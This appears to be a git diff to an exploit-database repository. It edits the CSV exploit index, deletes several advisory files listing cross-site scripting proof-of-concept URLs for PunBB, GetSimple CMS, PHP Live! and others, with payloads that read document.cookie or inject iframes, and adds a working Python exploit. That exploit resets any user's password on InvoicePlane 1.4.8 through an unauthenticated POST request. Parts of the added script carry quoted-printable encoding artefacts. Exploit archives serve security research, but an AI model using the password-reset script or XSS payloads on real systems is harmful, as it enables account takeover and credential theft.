-32349,platforms/php/webapps/32349.txt,"PunBB 1.2.x - 'p' Parameter Multiple Cross-Site Scripting Vulnerabilities",2008-08-20,"Henry Sudhof",php,webapps,0
 32351,platforms/php/webapps/32351.txt,"Jaw Portal 1.2 - 'index.php' Multiple Local File Inclusion",2008-09-10,SirGod,php,webapps,0
 32352,platforms/php/webapps/32352.txt,"AvailScript Job Portal Script - 'applynow.php' SQL Injection",2008-09-10,InjEctOr5,php,webapps,0
 32353,platforms/php/webapps/32353.txt,"Horde Application Framework 3.2.1 - Forward Slash Insufficient Filtering Cross-Site Scripting",2008-09-10,"Alexios Fakos",php,webapps,0
@@ -32896,7 +32886,7 @@ id,file,description,date,author,platform,type,port
 33558,platforms/php/webapps/33558.txt,"cPanel and WHM 11.25 - 'failurl' Parameter HTTP Response Splitting",2010-01-21,Trancer,php,webapps,0
 33561,platforms/php/webapps/33561.txt,"OpenX 2.6.1 - SQL Injection",2010-01-22,AndySoon,php,webapps,0
 33564,platforms/jsp/webapps/33564.txt,"Jetty 6.1.x - JSP Snoop Page Multiple Cross-Site Scripting Vulnerabilities",2009-10-24,aScii,jsp,webapps,0
-33565,platforms/php/webapps/33565.txt,"PunBB 1.3 - 'viewtopic.php' Cross-Site Scripting",2010-01-24,s4r4d0,php,webapps,0
+40752,platforms/php/webapps/40752.py,"InvoicePlane 1.4.8 - Password Reset",2016-11-11,feedersec,php,webapps,0
 33566,platforms/php/webapps/33566.txt,"Joomla! Component 3D Cloud - 'tagcloud.swf' Cross-Site Scripting",2010-01-26,MustLive,php,webapps,0
 33586,platforms/php/webapps/33586.txt,"Joomla! Component com_gambling - 'gamblingEvent' Parameter SQL Injection",2010-02-01,md.r00t,php,webapps,0
 33595,platforms/php/webapps/33595.txt,"Interspire Knowledge Manager < 5.1.3 - Multiple Remote Vulnerabilities",2010-02-04,"Cory Marsh",php,webapps,0
@@ -33317,7 +33307,6 @@ id,file,description,date,author,platform,type,port
 34317,platforms/php/webapps/34317.txt,"WS Interactive Automne 4.0 - '228-recherche.php' Cross-Site Scripting",2009-12-13,loneferret,php,webapps,0
 34318,platforms/php/webapps/34318.txt,"Zeecareers 2.0 - Cross-Site Scripting / Authentication Bypass",2009-12-13,bi0,php,webapps,0
 34319,platforms/php/webapps/34319.txt,"Ez Cart - 'index.php' Cross-Site Scripting",2009-12-14,anti-gov,php,webapps,0
-34320,platforms/php/webapps/34320.txt,"Getsimple CMS 2.01 - admin/template/error_checking.php Multiple Parameter Cross-Site Scripting",2010-07-15,Leonard,php,webapps,0
 34321,platforms/php/webapps/34321.txt,"Spitfire 1.0.381 - Cross-Site Scripting / Cross-Site Request Forgery",2010-07-15,"Nijel the Destroyer",php,webapps,0
 34322,platforms/php/webapps/34322.txt,"PHPWCMS 1.4.5 - 'PHPwcms.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0
 34323,platforms/php/webapps/34323.html,"DSite CMS 4.81 - 'modmenu.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0
@@ -33635,7 +33624,7 @@ id,file,description,date,author,platform,type,port
 34786,platforms/php/webapps/34786.txt,"eCardMAX - Multiple Cross-Site Scripting Vulnerabilities",2009-07-14,Moudi,php,webapps,0
 34787,platforms/php/webapps/34787.txt,"MODx 2.0.2-pl - manager/index.php modahsh Parameter Cross-Site Scripting",2010-09-29,"John Leitch",php,webapps,0
 34788,platforms/php/webapps/34788.txt,"MODx manager - /controllers/default/resource/tvs.php class_key Parameter Traversal Local File Inclusion",2010-09-29,"John Leitch",php,webapps,0
-34789,platforms/php/webapps/34789.html,"Getsimple CMS 2.01 - 'admin/changedata.php' Cross-Site Scripting",2010-09-29,"High-Tech Bridge SA",php,webapps,0
+34789,platforms/php/webapps/34789.html,"Getsimple CMS 2.01 - 'changedata.php' Cross-Site Scripting",2010-09-29,"High-Tech Bridge SA",php,webapps,0
 34790,platforms/php/webapps/34790.txt,"Pluck 4.6.3 - 'cont1' Parameter HTML Injection",2010-09-29,"High-Tech Bridge SA",php,webapps,0
 34791,platforms/php/webapps/34791.txt,"Swinger Club Portal - start.php id Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0
 34792,platforms/php/webapps/34792.txt,"Swinger Club Portal - start.php go Parameter Remote File Inclusion",2009-07-07,Moudi,php,webapps,0
@@ -33982,7 +33971,7 @@ id,file,description,date,author,platform,type,port
 35349,platforms/php/webapps/35349.txt,"Gollos 2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
 35350,platforms/php/webapps/35350.txt,"Wikipad 1.6.0 - Cross-Site Scripting / HTML Injection / Information Disclosure",2011-02-15,"High-Tech Bridge SA",php,webapps,0
 35351,platforms/php/webapps/35351.txt,"Photopad 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
-35353,platforms/php/webapps/35353.txt,"Getsimple CMS 2.03 - 'admin/upload-ajax.php' Arbitrary File Upload",2011-02-15,"s3rg3770 and  Chuzz",php,webapps,0
+35353,platforms/php/webapps/35353.txt,"Getsimple CMS 2.03 - 'upload-ajax.php' Arbitrary File Upload",2011-02-15,"s3rg3770 and  Chuzz",php,webapps,0
 35357,platforms/cgi/webapps/35357.txt,"Advantech EKI-6340 - Command Injection",2014-11-24,"Core Security",cgi,webapps,80
 35360,platforms/php/webapps/35360.txt,"WSN Guest 1.24 - 'wsnuser' Cookie Parameter SQL Injection",2011-02-18,"Aliaksandr Hartsuyeu",php,webapps,0
 35362,platforms/php/webapps/35362.txt,"Batavi 1.0 - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities",2011-02-21,"AutoSec Tools",php,webapps,0
@@ -34476,7 +34465,6 @@ id,file,description,date,author,platform,type,port
 36166,platforms/php/webapps/36166.txt,"WordPress Plugin BuddyPress 1.2.10 / WordPress Theme DEV Blogs Mu 1.2.6 (WordPress 3.1.4) - Regular Subscriber HTML Injection",2011-09-26,knull,php,webapps,0
 36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 - Cross-Site Scripting / Information Disclosure",2011-09-26,"Stefan Schurtz",php,webapps,0
 36168,platforms/php/webapps/36168.txt,"S9Y Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting",2011-09-26,"Stefan Schurtz",php,webapps,0
-36170,platforms/php/webapps/36170.txt,"PunBB 1.3.6 - 'browse.php' Cross-Site Scripting",2011-09-26,Amir,php,webapps,0
 36171,platforms/php/webapps/36171.txt,"Joomla! Component 'com_biitatemplateshop' - 'groups' Parameter SQL Injection",2011-09-26,"BHG Security Group",php,webapps,0
 36172,platforms/cfm/webapps/36172.txt,"Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-27,MustLive,cfm,webapps,0
 36173,platforms/php/webapps/36173.txt,"Vanira CMS - 'vtpidshow' Parameter SQL Injection",2011-09-27,"kurdish hackers team",php,webapps,0
@@ -35153,10 +35141,6 @@ id,file,description,date,author,platform,type,port
 37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 - Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80
 37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller - Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80
 37155,platforms/php/webapps/37155.txt,"WordPress Plugin WP-FaceThumb 0.1 - 'pagination_wp_facethum' Parameter Cross-Site Scripting",2012-05-13,d3v1l,php,webapps,0
-37156,platforms/php/webapps/37156.txt,"Getsimple CMS 3.1 - admin/theme.php err Parameter Reflected Cross-Site Scripting",2012-05-12,"Chokri Ben Achor",php,webapps,0
-37157,platforms/php/webapps/37157.txt,"Getsimple CMS 3.1 - admin/pages.php error Parameter Reflected Cross-Site Scripting",2012-05-12,"Chokri Ben Achor",php,webapps,0
-37158,platforms/php/webapps/37158.txt,"Getsimple CMS 3.1 - admin/index.php Multiple Parameter Reflected Cross-Site Scripting",2012-05-12,"Chokri Ben Achor",php,webapps,0
-37159,platforms/php/webapps/37159.txt,"Getsimple CMS 3.1 - admin/upload.php path Parameter Cross-Site Scripting",2012-05-12,"Chokri Ben Achor",php,webapps,0
 37161,platforms/php/webapps/37161.txt,"WordPress Plugin GRAND Flash Album Gallery 1.71 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
 37162,platforms/php/webapps/37162.txt,"WordPress Plugin Dynamic Widgets 1.5.1 - 'themes.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
 37166,platforms/php/webapps/37166.php,"WordPress Plugin dzs-zoomsounds 2.0 - Arbitrary File Upload",2015-06-01,"nabil chris",php,webapps,0
@@ -35911,8 +35895,6 @@ id,file,description,date,author,platform,type,port
 38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0
 38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-Based Blind SQL Injection",2015-10-19,LiquidWorm,php,webapps,0
 38499,platforms/php/webapps/38499.html,"PHPValley Micro Jobs Site Script - Spoofing",2013-04-27,"Jason Whelan",php,webapps,0
-38502,platforms/php/webapps/38502.txt,"Getsimple CMS - /admin/edit.php Multiple Parameter Cross-Site Scripting",2013-05-01,"High-Tech Bridge",php,webapps,0
-38503,platforms/php/webapps/38503.txt,"Getsimple CMS - /admin/filebrowser.php Multiple Parameter Cross-Site Scripting",2013-05-01,"High-Tech Bridge",php,webapps,0
 38506,platforms/php/webapps/38506.txt,"NetApp OnCommand System Manager - /zapiServlet CIFS Configuration Management Interface Multiple Parameter Cross-Site Scripting",2013-05-07,"M. Heinzl",php,webapps,0
 38507,platforms/php/webapps/38507.txt,"NetApp OnCommand System Manager - /zapiServlet User Management Interface Multiple Parameter Cross-Site Scripting",2013-05-07,"M. Heinzl",php,webapps,0
 38508,platforms/php/webapps/38508.txt,"MyBB Game Section Plugin - 'games.php' Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,anonymous,php,webapps,0

platforms/php/webapps/25182.txt

@@ -1,11 +0,0 @@
-source: http://www.securityfocus.com/bid/12708/info
-
-auraCMS is affected by multiple cross-site scripting vulnerabilities.
-
-These issues exist because the application fails to properly sanitize user-supplied input.
-
-Because of these vulnerabilities, an attacker may craft a link containing malicious HTML or script code and present the link to a victim. If the victim user follows the link, the attacker-supplied code will be executed in their browser in the security context of the vulnerable site. 
-
-http://www.example.com/[aura]/hits.php?&hits=%3Cscript%3Ealert(document.cookie)%3C/script%3E
-http://www.example.com/[aura]/index.php?query=%3Cscript%3Ealert(document.cookie)%3C/script%3E&pilih=search
-http://www.example.com/[aura]/counter.php?theCount=%3Cscript%3Ealert(document.cookie)%3C/script%3E 

platforms/php/webapps/27453.txt

@@ -1,7 +0,0 @@
-source: http://www.securityfocus.com/bid/17184/info
-
-PHP Live! is prone to a cross-site scripting vulnerability. This issue is due to a lack of proper sanitization of user-supplied input. 
-
-An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
-
-http://www.example.com/phplive/js/status_image.php?base_url=<script>alert(document.cookie)</script>

platforms/php/webapps/27860.txt

@@ -1,7 +0,0 @@
-source: http://www.securityfocus.com/bid/17960/info
-
-PHP Live Helper is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. 
-
-An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
-
-http://www.example.com/chat.php?action=showmain&PHPSESSID=XSS

platforms/php/webapps/29339.txt

@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/21737/info
-
-PHP Live! is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. 
-
-An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
-
-Version 3.2.2 was reported vulnerable; other versions may also be affected.
-
-/transcripts.php?action=view&deptid=1&userid=0&search_string=[XSS]

platforms/php/webapps/29340.txt

@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/21737/info
- 
-PHP Live! is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. 
- 
-An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
- 
-Version 3.2.2 was reported vulnerable; other versions may also be affected.
-
-http://www.example.com/index.php?l=[XSS]

platforms/php/webapps/29341.txt

@@ -1,10 +0,0 @@
-source: http://www.securityfocus.com/bid/21737/info
-  
-PHP Live! is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. 
-  
-An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
-  
-Version 3.2.2 was reported vulnerable; other versions may also be affected.
-
-/phplive/message_box.php?theme=&l=ezpub&x=1&deptid=[XSS]
-/phplive/message_box.php?theme=&l=admin&x=[XSS]

platforms/php/webapps/31152.txt

@@ -1,7 +0,0 @@
-source: http://www.securityfocus.com/bid/27745/info
-
-artmedic webdesign weblog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
-
-An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
-
-http://www.example.com/artmedic_weblog/artmedic_print.php?date=<script>alert(1)</script>

platforms/php/webapps/31153.txt

@@ -1,7 +0,0 @@
-source: http://www.securityfocus.com/bid/27745/info
- 
-artmedic webdesign weblog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
- 
-An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
-
-http://www.example.com/artmedic_weblog/index.php?jahrneu=<script>alert(1)</script>

platforms/php/webapps/32349.txt

@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/31082/info
-
-PunBB is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
-
-An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
-
-Versions prior to PunBB 1.2.20 are vulnerable.
-
-http://www.example.com/userlist.php?p=2<script>alert('meh');</script> 

platforms/php/webapps/33565.txt

@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/37930/info
-
-PunBB is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
-
-An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
-
-PunBB 1.3 is vulnerable; other versions may also be affected. 
-
-http://www.example.com/forum/viewtopic.php?pid=[Xss] 

platforms/php/webapps/34320.txt

@@ -1,25 +0,0 @@
-source: http://www.securityfocus.com/bid/41697/info
-
-GetSimple CMS is prone to multiple cross-site scripting vulnerabilities, multiple local file-include vulnerabilities, an HTML-injection vulnerability, and a directory-traversal vulnerability.
-
-Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, to retrieve and possibly execute arbitrary files through the use of directory-traversal strings, to obtain potentially sensitive information, or to execute arbitrary local scripts in the context of the webserver process.
-
-GetSimple CMS 2.01 is vulnerable; other versions may also be affected. 
-
-http://www.example.com/admin/template/error_checking.php?upd=bak-success&i18n[ER_BAKUP_DELETED]=[XSS]
-http://www.example.com/admin/template/error_checking.php?upd=bak-err&i18n[ER_REQ_PROC_FAIL]=[XSS]
-http://www.example.com/admin/template/error_checking.php?upd=bak-err&i18n[ERROR]=[XSS]
-http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=edit&i18n[ER_YOUR_CHANGES]=[XSS]
-http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=restore&i18n[ER_HASBEEN_REST]=[XSS]
-http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=delete&i18n[ER_HASBEEN_DEL]=[XSS]
-http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=delete&i18n[UNDO]=[XSS]
-http://www.example.com/admin/template/error_checking.php?upd=edit-index&i18n[ER_CANNOT_INDEX]=[XSS]
-http://www.example.com/admin/template/error_checking.php?restored=true&i18n[ER_OLD_RESTORED]=[XSS]
-http://www.example.com/admin/template/error_checking.php?upd=pwd-success&i18n[ER_NEW_PWD_SENT]=[XSS]
-http://www.example.com/admin/template/error_checking.php?upd=pwd-error&i18n[ER_SENDMAIL_ERR]=[XSS]
-http://www.example.com/admin/template/error_checking.php?upd=del-success&i18n[ER_FILE_DEL_SUC]=[XSS]
-http://www.example.com/admin/template/error_checking.php?upd=del-error&i18n[ER_PROBLEM_DEL]=[XSS]
-http://www.example.com/admin/template/error_checking.php?upd=comp-success&i18n[ER_COMPONENT_SAVE]=[XSS]
-http://www.example.com/admin/template/error_checking.php?upd=comp-restored&i18n[ER_COMPONENT_REST]=[XSS]
-http://www.example.com/admin/template/error_checking.php?cancel=test&i18n[ER_CANCELLED_FAIL]=[XSS]
-http://www.example.com/admin/template/error_checking.php?err=true&msg=[XSS] 

platforms/php/webapps/36170.txt

@@ -1,7 +0,0 @@
-source: http://www.securityfocus.com/bid/49776/info
-
-PunBB is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
-
-An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. 
-
-http://www.example.com/browse.php?keywords=[xss]&search=Search&projects=1&styles=1&forums=1 

platforms/php/webapps/37156.txt

@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/53501/info
-
-GetSimple CMS is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
-
-Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
-
-GetSimple CMS 3.1 is vulnerable; other versions may also be affected. 
-
-http://www.example.com/getsimple/admin/theme.php?err=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C 

platforms/php/webapps/37157.txt

@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/53501/info
- 
-GetSimple CMS is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
- 
-Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
- 
-GetSimple CMS 3.1 is vulnerable; other versions may also be affected. 
-
-http://www.example.com/getsimple/admin/pages.php?error=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C 

platforms/php/webapps/37158.txt

@@ -1,10 +0,0 @@
-source: http://www.securityfocus.com/bid/53501/info
-  
-GetSimple CMS is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
-  
-Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
-  
-GetSimple CMS 3.1 is vulnerable; other versions may also be affected. 
-
-http://www.example.com/getsimple/admin/index.php?success=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20width=800%20height=800%3E
-http://www.example.com/getsimple/admin/index.php?err=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20width=800%20height=800%3E 

platforms/php/webapps/37159.txt

@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/53501/info
-   
-GetSimple CMS is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
-   
-Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
-   
-GetSimple CMS 3.1 is vulnerable; other versions may also be affected. 
-
-http://www.example.com/getsimple/admin/upload.php?path=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20width=800%20height=800%3E&newfolder=rem0ve 

platforms/php/webapps/38502.txt

@@ -1,10 +0,0 @@
-source: http://www.securityfocus.com/bid/59600/info
-
-GetSimple CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
-
-An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
-
-GetSimple CMS 3.1.2 is vulnerable; prior versions may also be affected. 
-
-http://www.example.com/admin/edit.php?title="><scri<script></script>pt>alert(document.cookie);</scri<script>< /script>pt>
-http://www.example.com/admin/edit.php?menu="><scri<script></script>pt>alert(document.cookie);</scri<script></ script>pt> 

platforms/php/webapps/38503.txt

@@ -1,10 +0,0 @@
-source: http://www.securityfocus.com/bid/59600/info
- 
-GetSimple CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
- 
-An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
- 
-GetSimple CMS 3.1.2 is vulnerable; prior versions may also be affected. 
-
-http://www.example.com/admin/filebrowser.php?path="><scri<script></script>pt>alert(document.cookie);</scri<sc ript></script>pt>
-http://www.example.com/admin/filebrowser.php?returnid="><scri<script></script>pt>alert(document.cookie);</scr i<script></script>pt> 

platforms/php/webapps/40752.py

@@ -0,0 +1,27 @@
+# Exploit Title: InvoicePlane v1.4.8 Incorrect Access Control for password =
+reset
+# Date: 12-11-2016
+# Exploit Author: feedersec
+# Contact: feedersec@gmail.com
+# Vendor Homepage: https://invoiceplane.com
+# Software Link: https://invoiceplane.com/download/v1.4.8
+# Version: v1.4.8=20
+# Tested on: ubuntu 16.04 LTS
+
+# Description: An unauthenticated user can POST to=20
+# /index.php/sessions/passwordreset setting a new password for any user
+
+import urllib2, urllib
+
+#set parameters here
+user_id =3D '1'
+new_password =3D 'haxor'
+baseUrl =3D 'http://localhost/'
+####
+
+data =3D urllib.urlencode({'user_id': user_id,=20
+=09=09=09 'new_password' : new_password,
+=09=09=09 'btn_new_password' : '1'})
+
+req =3D urllib2.Request(baseUrl + 'index.php/sessions/passwordreset', data)
+response =3D urllib2.urlopen(req)